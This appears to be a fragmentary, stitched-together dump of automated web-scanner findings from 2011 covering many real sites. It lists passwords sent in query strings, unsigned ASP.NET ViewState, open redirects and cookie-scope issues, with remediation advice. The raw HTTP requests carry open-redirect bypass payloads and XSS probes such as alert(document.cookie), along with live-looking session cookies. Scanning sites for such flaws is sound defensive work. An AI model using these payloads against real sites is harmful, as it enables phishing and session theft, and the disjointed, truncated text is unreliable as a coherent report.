domain=.officedepot.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET / HTTP/1.1 Host: www.oneview.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:02:58 GMT Set-Cookie: JSESSIONID=22619842C67867F5B1EE74469F963957; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding X-Cache: MISS from squid.oneview.de X-Cache-Lookup: MISS from squid.oneview.de:80 Via: 1.0 squid.oneview.de:80 (squid/2.6.STABLE21) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE">
GET /p-bdv9UMaVrliL2 HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sun, 06 Feb 2011 16:11:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <p> Maybe you should try <a href="/hulu.com;jsessionid=65D59184928FE764BF04CAF9660122C1">hulu.com</a>, <a href="/gawker.com;jsessionid=65D59184928FE764BF04CAF9660122C1">gawker.com</a> or <a href="/evite.com;jsessionid=65D59184928FE764BF04CAF9660122C1">evite.com</a> ...[SNIP]...
GET /en_US/hi/customersupport/site-usage.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /en_US/hi/index.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:44 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944504607994; path=/; expires=Tue, 09-Feb-16 22:21:44 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000kscO5hdpunXSAOCMFtkSRfr:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
GET /rmb-account/login-page HTTP/1.1 Host: channelmarketing.owneriq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:46:51 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=kt1uph07r6rvoff2tchko0efd3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14989
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.jazdtech.com/techdirect/
The form contains the following password field:
password
Request
GET /techdirect/ HTTP/1.1 Host: www.jazdtech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:01:52 GMT Set-Cookie: JazdSession="a60b5303-7988-48d1-88b3-467a83635a2c:1297008112717"; Version=1; Max-Age=3600; Expires=Sun, 06-Feb-2011 17:01:52 GMT; Path=/ Set-Cookie: JazdTestCookie=1297008112717; Expires=Mon, 06-Feb-2012 16:01:52 GMT; Path=/ Set-Cookie: JSESSIONID=90039B3D2C4BBD4CB6E1E02847F77216; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Content-Length: 74356
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.technotizie.it/login-inside.php
The form contains the following password field:
pass2
Request
GET / HTTP/1.1 Host: www.technotizie.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
GET /default.aspx?tabid=168&appl_code=MEMBERS HTTP/1.1 Host: ebus.ota.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Remediation background
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
The value of the 14786739C435671106&ULP request parameter is used to perform an HTTP redirect. The payload .a3768b48eb5dcbf43/ was submitted in the 14786739C435671106&ULP parameter. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Request
GET /tpv/?14786739C435671106&ULP=.a3768b48eb5dcbf43/&zpar0=125_1_728x90_360_pvc_ad4matdedault HTTP/1.1 Host: ad.zanox.com Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:39:12 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C71884S1469386964569572361T0I14786739C0T0; domain=.zanox.com; path=/ Set-Cookie: zptpvc=5C71884S1469386964569572361T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:12 GMT; domain=.zanox.com; path=/ Content-Length: 0 Location: http://www.bild.de.a3768b48eb5dcbf43/&zpar0=125_1_728x90_360_pvc_ad4matdedault?zanpid=14786739C435671106T1469386964569572361 pragma: no-cache cache-control: no-store
The value of the target request parameter is used to perform an HTTP redirect. The payload http%3a//aa94df46ff741041f/a%3fhttp%3a//0.r.msn.com/%3fld%3d4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ was submitted in the target parameter. This caused a redirection to the following URL:
GET /track?target=http%3a//aa94df46ff741041f/a%3fhttp%3a//0.r.msn.com/%3fld%3d4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ&xargs=1Owx8oFMt4m2YkqUMiPXwDnPUhRRY7ZEJ9LJTWSrnbZhgBfErhtcKKOiM6mjHeLYQPOhFTlgMiQNUi0Wzinee2B3WGL1cDC9iHCONuiA3%2FJLEbd3x%2FFU5i2%2FejQpwMx5yyDTjsWiUUsISHcBq5Cyt5RwSg5CKdbMkrYy9xwqz2dX1VJJLhn25UnM9r3EOr3kRAA7PYs93YlDtwLI5JLm3nWA7dYYrFPozVln3uSAGFgS4lCNg3xHbrApZyDMytFV2l2C7ULWrmQ1l9bzagD%2FAT68Pby1uNFEA22B%2FM90suzy%2FYjy3MzE23bVmK7lC9jUeyBWeaoqNWxXGRluKS44nJO34%2BrioOQV%2FxSJ%2By45Fo8X%2FyWC5WegF0dVp6w1Bt2lFzVLgvn19KwnF%2BFWR4G6ZhENP1sKJJ8ayL0Tdvc1we8TPqrcCxAlGk5VR%2F94hQcEKqe6WwkOm3ytJOOEop9VFSJq%2FtFSYoywNhWzr%2BIMaHWBqkqSde8xNIVIc5X5QSFeoSqyFJwnv8A%3D&template=v1-450xauto\ HTTP/1.1 Host: mm.chitika.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _cc=G/SkJiIEkgB5jwthOgp2U7fj6wwhdgvL4c0tN7QIkjl+9DY+kxm0FYEPwYHEtzd1Eb9GVhAFySrB7FsCah5yekHnHk86QdWmqzPlPoX9fVgKhjoJ7H0CpjFT5Hp1o2UMeStsZFPsF38vogWeCxRsANnVfye1gm5VQVRitA3zocW7G6iOKSNpC8nW/fSMYPkd+FCgRcmr74lmkl5cwzW3Czwl6LeM3oQBJIYcJ6NbVb7AFAn8X+k1IsMDj5bEGLsE44aH3XGVfZEeq7YK0yCm1xoznT+oB6MyoGrFo+3L+n46HJMn/fIuhcbGfmpCGIWgP/8azfwodcqzdnmXzDHV02SLzkuIP4TROEiHhvvFYJCve1mdj9NNH2b6m71cRkwsP7WlTZEvF7RLkkrfjucSwCzhr5Z1qjMilr/trLois3rxw1y+NdQfz3XqMUHrYIFc6GSu7GKj22sCBmPetmAel7epjXByEoA7.VuO7eR5Qy1Z0VmN7sMLZzA.4;
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:58:26 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJSQEuhBljgvx6LisqP2AupJFgK5WemUmSqCRZBWwtlJoLJyYgB+x08rWfR/ShFOalNGTqfmziVraghl7E5uw5btOtwHMaMyaTgACvSU2yypTzpEyT0xJmemcUr7Es5js2KWhPNJnWvwgCUzuXtn+7LZL8AlfWaXmZXx2Wx5H1qwqh06v7K+IpyakF7aYkVgMVBE2Wi+QJT/Gzzv94Iln9xO7HrVO1SW3ncoYsd8Aef4rQIg1BI9+VO2aXj1rm0SQVcj4uAoSHDGTWyz9kMQZuCJ+xQ5TN0vkWVGtX3ywUgybMdWFAiySnIl5xjSWUbofjZzP8xaZu6ASmtWDtWpBJguSuvKrwgS9MAvZoTO1No57tqy3vrJSJtt4AU6OXJT+q/fTWAHMVBk4k59TvKlVk2TdUNIWpuvlfIxVcBD1YZ95x+m8m1CsEoijW3+yEIP8zDJLDJ/lcVGIRsSWrmwP+BoOhXD4nIlLKRgmNGg2FjoM3imzu8TD0/BF2uZxo5kZn5Z3kX5hOg==.r+pUKck79gCJz8mn8ogGtg.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:58:26 GMT Location: http://aa94df46ff741041f/a?http://0.r.msn.com/?ld=4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ Content-Length: 632 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://aa94df46ff741041f/a?http://0.r.msn.com/? ...[SNIP]...
The value of the Referer HTTP header is used to perform an HTTP redirect. The payload //a3998e29f3264cd04/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d was submitted in the Referer HTTP header. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by blocking absolute redirection targets starting with http:// or https://. However, an attacker can defeat this defense by omitting the protocol prefix from their absolute URL. If a redirection target starting with // is specified, then the browser will use the same protocol as the page which issued the redirection.
Because the data used in the redirection is submitted within a header, the application's behaviour is unlikely to be directly useful in lending credibility to a phishing attack. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
When attempting to block absolute redirection targets, the application should verify that the target begins with a single slash followed by a letter, and should reject any input containing a sequence of two slash characters.
Request
GET /ads/adclick.php HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313; Referer: //a3998e29f3264cd04/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:39:44 GMT Server: Apache X-Powered-By: PHP/4.4.7 Location: //a3998e29f3264cd04/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d Content-Length: 0 Connection: close Content-Type: text/html
The value of the Referer HTTP header is used to perform an HTTP redirect. The payload //af59a3cd4a9062842/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d was submitted in the Referer HTTP header. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by blocking absolute redirection targets starting with http:// or https://. However, an attacker can defeat this defense by omitting the protocol prefix from their absolute URL. If a redirection target starting with // is specified, then the browser will use the same protocol as the page which issued the redirection.
Because the data used in the redirection is submitted within a header, the application's behaviour is unlikely to be directly useful in lending credibility to a phishing attack. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
When attempting to block absolute redirection targets, the application should verify that the target begins with a single slash followed by a letter, and should reject any input containing a sequence of two slash characters.
Request
GET /index.php/sso_checker HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8; Referer: //af59a3cd4a9062842/a%3fhttp%3a//www.google.com/search%3fhl%3den%26q%3d
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 22:49:29 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; expires=Mon, 07-Mar-2011 22:49:29 GMT; path=/; domain=.manualsonline.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=26; __utmz=162857765.1296956996.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=5378e2dc-3193-11e0-bdbb-0030485f67c6; adsust=n1; adsus=26b9sk; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296956996.2; __utmc=162857765; __utmb=162857765.1.10.1296956996;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 22:49:36 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Set-Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; expires=Mon, 07-Mar-2011 22:49:36 GMT; path=/; domain=.manualsonline.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /managemystuff.html HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
<p>Access thousands of manuals, user community, personal homepage, original blog content and newsletters!</p> <form onsubmit="javascript: submitRegistration('Popup'); return false;" id="sRegFormIdPopu ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
